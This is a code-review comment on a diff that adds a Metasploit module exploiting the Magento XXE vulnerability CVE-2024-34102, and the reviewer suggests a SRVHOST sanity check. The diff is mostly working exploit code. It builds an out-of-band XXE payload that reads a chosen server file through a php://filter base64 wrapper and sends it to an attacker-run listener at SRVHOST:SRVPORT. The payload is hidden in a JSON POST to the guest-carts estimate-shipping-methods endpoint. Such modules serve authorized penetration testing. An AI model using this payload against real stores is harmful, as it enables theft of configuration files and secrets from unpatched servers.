modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb

```diff
@@ -0,0 +1,205 @@
+
+    version = Rex::Version.new(version)
+
+    return CheckCode::Safe("Detected Magento #{edition} edition version #{version} which is not vulnerable") unless
+      version <= (Rex::Version.new('2.4.7')) ||
+      version <= (Rex::Version.new('2.4.6-p5')) ||
+      version <= (Rex::Version.new('2.4.5-p7')) ||
+      version <= (Rex::Version.new('2.4.4-p8')) ||
+      (
+        edition == 'Enterprise' && (
+          version <= (Rex::Version.new('2.4.3-ext-7')) ||
+          version <= (Rex::Version.new('2.4.2-ext-7'))
+        )
+      )
+
+    CheckCode::Appears("Detected Magento #{edition} edition version #{version} which is vulnerable")
+  end
+
+  def ent_eval
+    @ent_eval ||= Rex::Text.rand_text_alpha_lower(4..8)
+  end
+
+  def leak_param_name
+    @leak_param_name ||= Rex::Text.rand_text_alpha_lower(4..8)
+  end
+
+  def dtd_param_name
+    @dtd_param_name ||= Rex::Text.rand_text_alpha_lower(4..8)
+  end
+
+  def make_xxe_dtd
+    filter_path = "php://filter/convert.base64-encode/resource=#{datastore['TARGETFILE']}"
+    ent_file = Rex::Text.rand_text_alpha_lower(4..8)
+    %(
+      <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">
+      <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/?#{leak_param_name}=%#{ent_file};'>">
+    )
+  end
+
+  def xxe_xml_data
+    param_entity_name = Rex::Text.rand_text_alpha_lower(4..8)
+
+    xml = "<?xml version='1.0' ?>"
+    xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"
+    xml += '['
+    xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"
+    xml += "    <!ENTITY % #{param_entity_name} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha_lower(4..8)}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
+    xml += ']'
+    xml += "> <r>&#{ent_eval};</r>"
+
+    xml
+  end
+
+  def xxe_request
+    vprint_status('Sending XXE request')
+
+    signature = Rex::Text.rand_text_alpha(6).capitalize
+
+    post_data = <<~EOF
+      {
+        "address": {
+        "#{signature}": "#{Rex::Text.rand_text_alpha_lower(4..8)}",
+        "totalsCollector": {
+          "collectorList": {
+          "totalCollector": {
+            "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": {
+            "data": "#{xxe_xml_data}",
+            "options": 12345678
+            }
+          }
+          }
+        }
+        }
+      }
+    EOF
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/rest/V1/guest-carts/1/estimate-shipping-methods'),
+      'ctype' => 'application/json',
+      'data' => post_data
+    })
+
+    fail_with(Failure::UnexpectedReply, "Server returned unexpected response: #{res.code}") unless res&.code == 400
+
+    body = res.get_json_document
+
+    fail_with(Failure::UnexpectedReply, 'Server might not be vulnerable') unless body['parameters']['fieldName'] == signature
+  end
+
+  def run
```

Comment:
If `srvhost` is set to `0.0.0.0` the framework will attempt to automatically set it to your default `LHOST` although that isn't always accessible by your target (which was the case in my testing). So I think it is best to `fail_with(Failure::BadConfig ...` in order to inform the user they should be setting this value themselves. 


```suggestion
  def run
    if datastore['SRVHOST'] == '0.0.0.0' or datastore['SRVHOST'] == "::"
      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
    end

```